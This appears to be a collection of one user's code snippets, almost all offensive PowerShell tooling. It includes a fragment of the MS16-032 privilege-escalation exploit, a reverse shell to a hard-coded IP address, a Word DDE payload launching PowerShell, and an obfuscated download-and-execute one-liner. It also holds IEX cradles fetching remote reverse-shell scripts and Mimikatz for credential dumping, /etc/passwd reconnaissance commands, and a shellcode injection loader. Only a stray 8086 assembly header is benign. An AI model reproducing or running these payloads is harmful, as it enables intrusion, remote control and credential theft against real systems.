frknozr

function Invoke-MS16-032 {
<#
.SYNOPSIS
    
    PowerShell implementation of MS16-032. The exploit targets all vulnerable
    operating systems that support PowerShell v2+. Credit for the discovery of
    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
    
    Targets:
    

frknozr

$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443);
"Working"
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();

frknozr

{SET C "{QUOTE 67 58 92 92 80 114 111 103 114 97 109 115 92 92 77 105 99 114 111 115 111 102 116 92 92 79 102 102 105 99 101 92 92 77 83 87 111 114 100 46 101 120 101 92 92 46 46 92 92 46 46 92 92 46 46 92 92 46 46 92 92 119 105 110 100 111 119 115 92 92 115 121 115 116 101 109 51 50 92 92 119 105 110 100 111 119 115 112 111 119 101 114 115 104 101 108 108 92 92 118 49 46 48 92 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101} "}

{DDE {REF C} "a"}

frknozr

 .( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) )

frknozr

Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1')

frknozr

Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

frknozr

Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1)

frknozr

;====================================================================
; Main.asm file generated by New Project wizard
;
; Created:   Cum Mar 11 2016
; Processor: 8086
; Compiler:  MASM32
;
; Before starting simulation set Internal Memory Size 
; in the 8086 model properties to 0x10000
;====================================================================

frknozr

whoami
cat /etc/passwd
uname -a

frknozr

$knQoUoTfNfL = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x